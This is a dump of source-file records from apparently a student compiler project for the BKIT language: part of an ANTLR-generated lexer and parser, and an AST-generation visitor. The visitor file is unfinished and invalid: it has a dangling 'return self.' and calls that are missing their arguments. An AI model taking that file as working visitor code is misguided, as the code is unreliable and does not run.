\"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \n \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \n \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \n \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\", \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", \n \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", 
\"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[26] = self.STRING_LIT_action \n actions[93] = self.ILLEGAL_ESCAPE_action \n actions[94] = self.UNCLOSE_STRING_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def STRING_LIT_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n def ILLEGAL_ESCAPE_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 2:\n\n y = str(self.text)\n self.text = y[1:]\n \n \n\n\n" }, { "alpha_fraction": 0.5858895778656006, "alphanum_fraction": 0.5937773585319519, "avg_line_length": 30.27397346496582, "blob_id": "7a7b4c4f4a69e1f517fb10f47c72df0c885ce03a", "content_id": "308e390be7a39b218ef3157c11c84edab02f452f", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 2282, "license_type": "no_license", "max_line_length": 97, "num_lines": 73, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration0.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# if ctx.vardecls():\n# return self.visitVardecls(ctx.vardecls()) + 1 if ctx.vardecls() else 1\n\n# def visitVardecls(self,ctx:MPParser.VardeclsContext):\n# if ctx.vardecl():\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n# else:\n# return 0\n\n# def visitVardecltail(self,ctx:MPParser.VardecltailContext): \n# if ctx.vardecl():\n# return self.visitVarDecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) \n# else:\n# return 0\n\n# def visitVardecl(self,ctx:MPParser.VardeclContext): \n# res = self.visitMptype(ctx.mptype()) + self.visitIds(ctx.ids())\n# if res:\n# return res + 1\n# else:\n# return res\n\n# def visitMptype(self,ctx:MPParser.MptypeContext):\n# if ctx.INTTYPE() or ctx.FLOATTYPE():\n# return 1\n# else:\n# return 0\n\n# def visitIds(self,ctx:MPParser.IdsContext):\n# if ctx.ids():\n# return 1 + 1 + self.visitIds(ctx.ids())\n# else:\n# if ctx.ID():\n# return 1\n# else:\n# return 0\n\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n if ctx.vardecls():\n return self.visitVardecls(ctx.vardecls()) + 1 if ctx.vardecls() else 1\n else:\n return 1\n\n def visitVardecls(self,ctx:BKITParser.VardeclsContext):\n if ctx.vardecl():\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail())\n else:\n return 0\n\n def visitVardecltail(self,ctx:BKITParser.VardecltailContext): \n return self.\n\n def visitVardecl(self,ctx:BKITParser.VardeclContext):\n return self.visitIds() + self.visitMptype()\n\n def 
visitMptype(self,ctx:BKITParser.MptypeContext):\n return 1\n\n def visitIds(self,ctx:BKITParser.IdsContext):\n if ctx.ids():\n return 1 + self.visitIds(ctx.Ids())\n else:\n return 0" }, { "alpha_fraction": 0.48767709732055664, "alphanum_fraction": 0.549540102481842, "avg_line_length": 34.34391403198242, "blob_id": "4a805a02022e055ce0b3d749683dd9341496c02b", "content_id": "b89791e7a0fa30c794dee056fca225bd4adfed40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114705, "license_type": "no_license", "max_line_length": 455, "num_lines": 3245, "path": "/Assignments/assignment4/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3M\")\n buf.write(\"\\u01bb\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\4\\'\\t\\'\\3\\2\\3\\2\\3\\2\\7\\2R\\n\\2\\f\\2\\16\\2U\\13\\2\\3\\2\\7\\2\")\n buf.write(\"X\\n\\2\\f\\2\\16\\2[\\13\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\5\\4i\\n\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\4p\\n\\4\\f\")\n 
buf.write(\"\\4\\16\\4s\\13\\4\\3\\4\\7\\4v\\n\\4\\f\\4\\16\\4y\\13\\4\\3\\4\\3\\4\\3\\4\")\n buf.write(\"\\3\\5\\3\\5\\3\\5\\7\\5\\u0081\\n\\5\\f\\5\\16\\5\\u0084\\13\\5\\3\\5\\7\\5\")\n buf.write(\"\\u0087\\n\\5\\f\\5\\16\\5\\u008a\\13\\5\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\5\")\n buf.write(\"\\6\\u009f\\n\\6\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00aa\")\n buf.write(\"\\n\\7\\f\\7\\16\\7\\u00ad\\13\\7\\3\\7\\3\\7\\5\\7\\u00b1\\n\\7\\3\\7\\3\\7\")\n buf.write(\"\\3\\7\\3\\b\\3\\b\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\")\n buf.write(\"\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\13\\3\")\n buf.write(\"\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\5\\f\\u00d7\\n\\f\\3\\f\")\n buf.write(\"\\3\\f\\3\\f\\3\\r\\3\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\7\")\n buf.write(\"\\17\\u00e5\\n\\17\\f\\17\\16\\17\\u00e8\\13\\17\\7\\17\\u00ea\\n\\17\")\n buf.write(\"\\f\\17\\16\\17\\u00ed\\13\\17\\3\\17\\3\\17\\3\\20\\3\\20\\5\\20\\u00f3\")\n buf.write(\"\\n\\20\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\5\\21\\u00fa\\n\\21\\3\\22\\3\")\n buf.write(\"\\22\\3\\22\\3\\22\\3\\22\\3\\22\\7\\22\\u0102\\n\\22\\f\\22\\16\\22\\u0105\")\n buf.write(\"\\13\\22\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\7\\23\\u010d\\n\\23\\f\")\n buf.write(\"\\23\\16\\23\\u0110\\13\\23\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\7\")\n buf.write(\"\\24\\u0118\\n\\24\\f\\24\\16\\24\\u011b\\13\\24\\3\\25\\3\\25\\3\\25\\5\")\n buf.write(\"\\25\\u0120\\n\\25\\3\\26\\3\\26\\3\\26\\5\\26\\u0125\\n\\26\\3\\27\\3\\27\")\n buf.write(\"\\5\\27\\u0129\\n\\27\\3\\30\\3\\30\\3\\30\\3\\30\\3\\30\\6\\30\\u0130\\n\")\n buf.write(\"\\30\\r\\30\\16\\30\\u0131\\3\\31\\3\\31\\5\\31\\u0136\\n\\31\\3\\32\\3\")\n buf.write(\"\\32\\3\\32\\3\\32\\3\\32\\5\\32\\u013d\\n\\32\\3\\33\\3\\33\\3\\33\\5\\33\")\n 
buf.write(\"\\u0142\\n\\33\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\7\\34\\u0149\\n\\34\\f\")\n buf.write(\"\\34\\16\\34\\u014c\\13\\34\\7\\34\\u014e\\n\\34\\f\\34\\16\\34\\u0151\")\n buf.write(\"\\13\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\")\n buf.write(\"\\35\\3\\35\\5\\35\\u015e\\n\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\")\n buf.write(\"\\3 \\3 \\3 \\5 \\u0169\\n \\3 \\3 \\3 \\5 \\u016e\\n \\7 \\u0170\\n\")\n buf.write(\" \\f \\16 \\u0173\\13 \\5 \\u0175\\n \\3 \\3 \\3!\\3!\\5!\\u017b\\n\")\n buf.write(\"!\\3!\\3!\\3!\\5!\\u0180\\n!\\7!\\u0182\\n!\\f!\\16!\\u0185\\13!\\3\")\n buf.write(\"\\\"\\3\\\"\\3\\\"\\3\\\"\\6\\\"\\u018b\\n\\\"\\r\\\"\\16\\\"\\u018c\\3\\\"\\5\\\"\\u0190\")\n buf.write(\"\\n\\\"\\3\\\"\\3\\\"\\3\\\"\\5\\\"\\u0195\\n\\\"\\3#\\3#\\3#\\3#\\6#\\u019b\\n\")\n buf.write(\"#\\r#\\16#\\u019c\\3#\\5#\\u01a0\\n#\\3$\\3$\\3$\\3$\\3$\\6$\\u01a7\")\n buf.write(\"\\n$\\r$\\16$\\u01a8\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\7\")\n buf.write(\"\\'\\u01b6\\n\\'\\f\\'\\16\\'\\u01b9\\13\\'\\3\\'\\2\\5\\\"$&(\\2\\4\\6\\b\")\n buf.write(\"\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\\36 \\\"$&(*,.\\60\\62\\64\\668\")\n buf.write(\":<>@BDFHJL\\2\\b\\3\\2)\\63\\3\\2\\'(\\3\\2\\35 \\3\\2!%\\3\\2\\37 \\3\")\n buf.write(\"\\2\\4\\7\\2\\u01c6\\2S\\3\\2\\2\\2\\4^\\3\\2\\2\\2\\6b\\3\\2\\2\\2\\b\\u0082\")\n buf.write(\"\\3\\2\\2\\2\\n\\u009e\\3\\2\\2\\2\\f\\u00a0\\3\\2\\2\\2\\16\\u00b5\\3\\2\")\n buf.write(\"\\2\\2\\20\\u00b7\\3\\2\\2\\2\\22\\u00c6\\3\\2\\2\\2\\24\\u00cd\\3\\2\\2\")\n buf.write(\"\\2\\26\\u00d6\\3\\2\\2\\2\\30\\u00db\\3\\2\\2\\2\\32\\u00dd\\3\\2\\2\\2\")\n buf.write(\"\\34\\u00df\\3\\2\\2\\2\\36\\u00f0\\3\\2\\2\\2 \\u00f9\\3\\2\\2\\2\\\"\\u00fb\")\n buf.write(\"\\3\\2\\2\\2$\\u0106\\3\\2\\2\\2&\\u0111\\3\\2\\2\\2(\\u011f\\3\\2\\2\\2\")\n buf.write(\"*\\u0124\\3\\2\\2\\2,\\u0128\\3\\2\\2\\2.\\u012a\\3\\2\\2\\2\\60\\u0135\")\n buf.write(\"\\3\\2\\2\\2\\62\\u013c\\3\\2\\2\\2\\64\\u0141\\3\\2\\2\\2\\66\\u0143\\3\")\n 
buf.write(\"\\2\\2\\28\\u015d\\3\\2\\2\\2:\\u015f\\3\\2\\2\\2<\\u0163\\3\\2\\2\\2>\\u0165\")\n buf.write(\"\\3\\2\\2\\2@\\u017a\\3\\2\\2\\2B\\u018f\\3\\2\\2\\2D\\u019f\\3\\2\\2\\2\")\n buf.write(\"F\\u01a1\\3\\2\\2\\2H\\u01aa\\3\\2\\2\\2J\\u01ae\\3\\2\\2\\2L\\u01b2\\3\")\n buf.write(\"\\2\\2\\2NO\\5\\4\\3\\2OP\\7<\\2\\2PR\\3\\2\\2\\2QN\\3\\2\\2\\2RU\\3\\2\\2\")\n buf.write(\"\\2SQ\\3\\2\\2\\2ST\\3\\2\\2\\2TY\\3\\2\\2\\2US\\3\\2\\2\\2VX\\5\\6\\4\\2W\")\n buf.write(\"V\\3\\2\\2\\2X[\\3\\2\\2\\2YW\\3\\2\\2\\2YZ\\3\\2\\2\\2Z\\\\\\3\\2\\2\\2[Y\\3\")\n buf.write(\"\\2\\2\\2\\\\]\\7\\2\\2\\3]\\3\\3\\2\\2\\2^_\\7\\30\\2\\2_`\\7:\\2\\2`a\\5@\")\n buf.write(\"!\\2a\\5\\3\\2\\2\\2bc\\7\\23\\2\\2cd\\7:\\2\\2dh\\7\\3\\2\\2ef\\7\\25\\2\")\n buf.write(\"\\2fg\\7:\\2\\2gi\\5L\\'\\2he\\3\\2\\2\\2hi\\3\\2\\2\\2ij\\3\\2\\2\\2jk\\7\")\n buf.write(\"\\b\\2\\2kq\\7:\\2\\2lm\\5\\16\\b\\2mn\\7<\\2\\2np\\3\\2\\2\\2ol\\3\\2\\2\")\n buf.write(\"\\2ps\\3\\2\\2\\2qo\\3\\2\\2\\2qr\\3\\2\\2\\2rw\\3\\2\\2\\2sq\\3\\2\\2\\2t\")\n buf.write(\"v\\5\\n\\6\\2ut\\3\\2\\2\\2vy\\3\\2\\2\\2wu\\3\\2\\2\\2wx\\3\\2\\2\\2xz\\3\")\n buf.write(\"\\2\\2\\2yw\\3\\2\\2\\2z{\\7\\17\\2\\2{|\\7;\\2\\2|\\7\\3\\2\\2\\2}~\\5\\16\")\n buf.write(\"\\b\\2~\\177\\7<\\2\\2\\177\\u0081\\3\\2\\2\\2\\u0080}\\3\\2\\2\\2\\u0081\")\n buf.write(\"\\u0084\\3\\2\\2\\2\\u0082\\u0080\\3\\2\\2\\2\\u0082\\u0083\\3\\2\\2\\2\")\n buf.write(\"\\u0083\\u0088\\3\\2\\2\\2\\u0084\\u0082\\3\\2\\2\\2\\u0085\\u0087\\5\")\n buf.write(\"\\n\\6\\2\\u0086\\u0085\\3\\2\\2\\2\\u0087\\u008a\\3\\2\\2\\2\\u0088\\u0086\")\n buf.write(\"\\3\\2\\2\\2\\u0088\\u0089\\3\\2\\2\\2\\u0089\\t\\3\\2\\2\\2\\u008a\\u0088\")\n buf.write(\"\\3\\2\\2\\2\\u008b\\u009f\\5\\f\\7\\2\\u008c\\u009f\\5\\20\\t\\2\\u008d\")\n buf.write(\"\\u009f\\5\\22\\n\\2\\u008e\\u009f\\5\\24\\13\\2\\u008f\\u0090\\5\\26\")\n buf.write(\"\\f\\2\\u0090\\u0091\\7<\\2\\2\\u0091\\u009f\\3\\2\\2\\2\\u0092\\u0093\")\n 
buf.write(\"\\5\\30\\r\\2\\u0093\\u0094\\7<\\2\\2\\u0094\\u009f\\3\\2\\2\\2\\u0095\")\n buf.write(\"\\u0096\\5\\32\\16\\2\\u0096\\u0097\\7<\\2\\2\\u0097\\u009f\\3\\2\\2\")\n buf.write(\"\\2\\u0098\\u0099\\5\\34\\17\\2\\u0099\\u009a\\7<\\2\\2\\u009a\\u009f\")\n buf.write(\"\\3\\2\\2\\2\\u009b\\u009c\\5\\36\\20\\2\\u009c\\u009d\\7<\\2\\2\\u009d\")\n buf.write(\"\\u009f\\3\\2\\2\\2\\u009e\\u008b\\3\\2\\2\\2\\u009e\\u008c\\3\\2\\2\\2\")\n buf.write(\"\\u009e\\u008d\\3\\2\\2\\2\\u009e\\u008e\\3\\2\\2\\2\\u009e\\u008f\\3\")\n buf.write(\"\\2\\2\\2\\u009e\\u0092\\3\\2\\2\\2\\u009e\\u0095\\3\\2\\2\\2\\u009e\\u0098\")\n buf.write(\"\\3\\2\\2\\2\\u009e\\u009b\\3\\2\\2\\2\\u009f\\13\\3\\2\\2\\2\\u00a0\\u00a1\")\n buf.write(\"\\7\\24\\2\\2\\u00a1\\u00a2\\5 \\21\\2\\u00a2\\u00a3\\7\\27\\2\\2\\u00a3\")\n buf.write(\"\\u00ab\\5\\b\\5\\2\\u00a4\\u00a5\\7\\r\\2\\2\\u00a5\\u00a6\\5 \\21\\2\")\n buf.write(\"\\u00a6\\u00a7\\7\\27\\2\\2\\u00a7\\u00a8\\5\\b\\5\\2\\u00a8\\u00aa\")\n buf.write(\"\\3\\2\\2\\2\\u00a9\\u00a4\\3\\2\\2\\2\\u00aa\\u00ad\\3\\2\\2\\2\\u00ab\")\n buf.write(\"\\u00a9\\3\\2\\2\\2\\u00ab\\u00ac\\3\\2\\2\\2\\u00ac\\u00b0\\3\\2\\2\\2\")\n buf.write(\"\\u00ad\\u00ab\\3\\2\\2\\2\\u00ae\\u00af\\7\\f\\2\\2\\u00af\\u00b1\\5\")\n buf.write(\"\\b\\5\\2\\u00b0\\u00ae\\3\\2\\2\\2\\u00b0\\u00b1\\3\\2\\2\\2\\u00b1\\u00b2\")\n buf.write(\"\\3\\2\\2\\2\\u00b2\\u00b3\\7\\16\\2\\2\\u00b3\\u00b4\\7;\\2\\2\\u00b4\")\n buf.write(\"\\r\\3\\2\\2\\2\\u00b5\\u00b6\\5\\4\\3\\2\\u00b6\\17\\3\\2\\2\\2\\u00b7\")\n buf.write(\"\\u00b8\\7\\22\\2\\2\\u00b8\\u00b9\\7\\64\\2\\2\\u00b9\\u00ba\\7\\3\\2\")\n buf.write(\"\\2\\u00ba\\u00bb\\7>\\2\\2\\u00bb\\u00bc\\5 \\21\\2\\u00bc\\u00bd\")\n buf.write(\"\\7=\\2\\2\\u00bd\\u00be\\5 \\21\\2\\u00be\\u00bf\\7=\\2\\2\\u00bf\\u00c0\")\n buf.write(\"\\5 \\21\\2\\u00c0\\u00c1\\7\\65\\2\\2\\u00c1\\u00c2\\7\\13\\2\\2\\u00c2\")\n buf.write(\"\\u00c3\\5\\b\\5\\2\\u00c3\\u00c4\\7\\20\\2\\2\\u00c4\\u00c5\\7;\\2\\2\")\n 
buf.write(\"\\u00c5\\21\\3\\2\\2\\2\\u00c6\\u00c7\\7\\31\\2\\2\\u00c7\\u00c8\\5 \")\n buf.write(\"\\21\\2\\u00c8\\u00c9\\7\\13\\2\\2\\u00c9\\u00ca\\5\\b\\5\\2\\u00ca\\u00cb\")\n buf.write(\"\\7\\21\\2\\2\\u00cb\\u00cc\\7;\\2\\2\\u00cc\\23\\3\\2\\2\\2\\u00cd\\u00ce\")\n buf.write(\"\\7\\13\\2\\2\\u00ce\\u00cf\\5\\b\\5\\2\\u00cf\\u00d0\\7\\31\\2\\2\\u00d0\")\n buf.write(\"\\u00d1\\5 \\21\\2\\u00d1\\u00d2\\7\\34\\2\\2\\u00d2\\u00d3\\7;\\2\\2\")\n buf.write(\"\\u00d3\\25\\3\\2\\2\\2\\u00d4\\u00d7\\5.\\30\\2\\u00d5\\u00d7\\7\\3\")\n buf.write(\"\\2\\2\\u00d6\\u00d4\\3\\2\\2\\2\\u00d6\\u00d5\\3\\2\\2\\2\\u00d7\\u00d8\")\n buf.write(\"\\3\\2\\2\\2\\u00d8\\u00d9\\7>\\2\\2\\u00d9\\u00da\\5 \\21\\2\\u00da\")\n buf.write(\"\\27\\3\\2\\2\\2\\u00db\\u00dc\\7\\t\\2\\2\\u00dc\\31\\3\\2\\2\\2\\u00dd\")\n buf.write(\"\\u00de\\7\\n\\2\\2\\u00de\\33\\3\\2\\2\\2\\u00df\\u00e0\\7\\3\\2\\2\\u00e0\")\n buf.write(\"\\u00eb\\7\\64\\2\\2\\u00e1\\u00e6\\5 \\21\\2\\u00e2\\u00e3\\7=\\2\\2\")\n buf.write(\"\\u00e3\\u00e5\\5 \\21\\2\\u00e4\\u00e2\\3\\2\\2\\2\\u00e5\\u00e8\\3\")\n buf.write(\"\\2\\2\\2\\u00e6\\u00e4\\3\\2\\2\\2\\u00e6\\u00e7\\3\\2\\2\\2\\u00e7\\u00ea\")\n buf.write(\"\\3\\2\\2\\2\\u00e8\\u00e6\\3\\2\\2\\2\\u00e9\\u00e1\\3\\2\\2\\2\\u00ea\")\n buf.write(\"\\u00ed\\3\\2\\2\\2\\u00eb\\u00e9\\3\\2\\2\\2\\u00eb\\u00ec\\3\\2\\2\\2\")\n buf.write(\"\\u00ec\\u00ee\\3\\2\\2\\2\\u00ed\\u00eb\\3\\2\\2\\2\\u00ee\\u00ef\\7\")\n buf.write(\"\\65\\2\\2\\u00ef\\35\\3\\2\\2\\2\\u00f0\\u00f2\\7\\26\\2\\2\\u00f1\\u00f3\")\n buf.write(\"\\5 \\21\\2\\u00f2\\u00f1\\3\\2\\2\\2\\u00f2\\u00f3\\3\\2\\2\\2\\u00f3\")\n buf.write(\"\\37\\3\\2\\2\\2\\u00f4\\u00f5\\5\\\"\\22\\2\\u00f5\\u00f6\\t\\2\\2\\2\\u00f6\")\n buf.write(\"\\u00f7\\5\\\"\\22\\2\\u00f7\\u00fa\\3\\2\\2\\2\\u00f8\\u00fa\\5\\\"\\22\")\n buf.write(\"\\2\\u00f9\\u00f4\\3\\2\\2\\2\\u00f9\\u00f8\\3\\2\\2\\2\\u00fa!\\3\\2\")\n buf.write(\"\\2\\2\\u00fb\\u00fc\\b\\22\\1\\2\\u00fc\\u00fd\\5$\\23\\2\\u00fd\\u0103\")\n 
buf.write(\"\\3\\2\\2\\2\\u00fe\\u00ff\\f\\4\\2\\2\\u00ff\\u0100\\t\\3\\2\\2\\u0100\")\n buf.write(\"\\u0102\\5$\\23\\2\\u0101\\u00fe\\3\\2\\2\\2\\u0102\\u0105\\3\\2\\2\\2\")\n buf.write(\"\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104#\\3\\2\\2\")\n buf.write(\"\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0107\\b\\23\\1\\2\\u0107\\u0108\")\n buf.write(\"\\5&\\24\\2\\u0108\\u010e\\3\\2\\2\\2\\u0109\\u010a\\f\\4\\2\\2\\u010a\")\n buf.write(\"\\u010b\\t\\4\\2\\2\\u010b\\u010d\\5&\\24\\2\\u010c\\u0109\\3\\2\\2\\2\")\n buf.write(\"\\u010d\\u0110\\3\\2\\2\\2\\u010e\\u010c\\3\\2\\2\\2\\u010e\\u010f\\3\")\n buf.write(\"\\2\\2\\2\\u010f%\\3\\2\\2\\2\\u0110\\u010e\\3\\2\\2\\2\\u0111\\u0112\")\n buf.write(\"\\b\\24\\1\\2\\u0112\\u0113\\5(\\25\\2\\u0113\\u0119\\3\\2\\2\\2\\u0114\")\n buf.write(\"\\u0115\\f\\4\\2\\2\\u0115\\u0116\\t\\5\\2\\2\\u0116\\u0118\\5(\\25\\2\")\n buf.write(\"\\u0117\\u0114\\3\\2\\2\\2\\u0118\\u011b\\3\\2\\2\\2\\u0119\\u0117\\3\")\n buf.write(\"\\2\\2\\2\\u0119\\u011a\\3\\2\\2\\2\\u011a\\'\\3\\2\\2\\2\\u011b\\u0119\")\n buf.write(\"\\3\\2\\2\\2\\u011c\\u011d\\7&\\2\\2\\u011d\\u0120\\5(\\25\\2\\u011e\")\n buf.write(\"\\u0120\\5*\\26\\2\\u011f\\u011c\\3\\2\\2\\2\\u011f\\u011e\\3\\2\\2\\2\")\n buf.write(\"\\u0120)\\3\\2\\2\\2\\u0121\\u0122\\t\\6\\2\\2\\u0122\\u0125\\5*\\26\")\n buf.write(\"\\2\\u0123\\u0125\\5,\\27\\2\\u0124\\u0121\\3\\2\\2\\2\\u0124\\u0123\")\n buf.write(\"\\3\\2\\2\\2\\u0125+\\3\\2\\2\\2\\u0126\\u0129\\5.\\30\\2\\u0127\\u0129\")\n buf.write(\"\\5\\60\\31\\2\\u0128\\u0126\\3\\2\\2\\2\\u0128\\u0127\\3\\2\\2\\2\\u0129\")\n buf.write(\"-\\3\\2\\2\\2\\u012a\\u012f\\5\\60\\31\\2\\u012b\\u012c\\7\\66\\2\\2\\u012c\")\n buf.write(\"\\u012d\\5 \\21\\2\\u012d\\u012e\\7\\67\\2\\2\\u012e\\u0130\\3\\2\\2\")\n buf.write(\"\\2\\u012f\\u012b\\3\\2\\2\\2\\u0130\\u0131\\3\\2\\2\\2\\u0131\\u012f\")\n buf.write(\"\\3\\2\\2\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132/\\3\\2\\2\\2\\u0133\\u0136\")\n 
buf.write(\"\\5\\66\\34\\2\\u0134\\u0136\\5\\62\\32\\2\\u0135\\u0133\\3\\2\\2\\2\\u0135\")\n buf.write(\"\\u0134\\3\\2\\2\\2\\u0136\\61\\3\\2\\2\\2\\u0137\\u013d\\5\\64\\33\\2\")\n buf.write(\"\\u0138\\u0139\\7\\64\\2\\2\\u0139\\u013a\\5 \\21\\2\\u013a\\u013b\")\n buf.write(\"\\7\\65\\2\\2\\u013b\\u013d\\3\\2\\2\\2\\u013c\\u0137\\3\\2\\2\\2\\u013c\")\n buf.write(\"\\u0138\\3\\2\\2\\2\\u013d\\63\\3\\2\\2\\2\\u013e\\u0142\\7\\3\\2\\2\\u013f\")\n buf.write(\"\\u0142\\5<\\37\\2\\u0140\\u0142\\5> \\2\\u0141\\u013e\\3\\2\\2\\2\\u0141\")\n buf.write(\"\\u013f\\3\\2\\2\\2\\u0141\\u0140\\3\\2\\2\\2\\u0142\\65\\3\\2\\2\\2\\u0143\")\n buf.write(\"\\u0144\\7\\3\\2\\2\\u0144\\u014f\\7\\64\\2\\2\\u0145\\u014a\\5 \\21\")\n buf.write(\"\\2\\u0146\\u0147\\7=\\2\\2\\u0147\\u0149\\5 \\21\\2\\u0148\\u0146\")\n buf.write(\"\\3\\2\\2\\2\\u0149\\u014c\\3\\2\\2\\2\\u014a\\u0148\\3\\2\\2\\2\\u014a\")\n buf.write(\"\\u014b\\3\\2\\2\\2\\u014b\\u014e\\3\\2\\2\\2\\u014c\\u014a\\3\\2\\2\\2\")\n buf.write(\"\\u014d\\u0145\\3\\2\\2\\2\\u014e\\u0151\\3\\2\\2\\2\\u014f\\u014d\\3\")\n buf.write(\"\\2\\2\\2\\u014f\\u0150\\3\\2\\2\\2\\u0150\\u0152\\3\\2\\2\\2\\u0151\\u014f\")\n buf.write(\"\\3\\2\\2\\2\\u0152\\u0153\\7\\65\\2\\2\\u0153\\67\\3\\2\\2\\2\\u0154\\u0155\")\n buf.write(\"\\7\\66\\2\\2\\u0155\\u0156\\5 \\21\\2\\u0156\\u0157\\7\\67\\2\\2\\u0157\")\n buf.write(\"\\u015e\\3\\2\\2\\2\\u0158\\u0159\\7\\66\\2\\2\\u0159\\u015a\\5 \\21\")\n 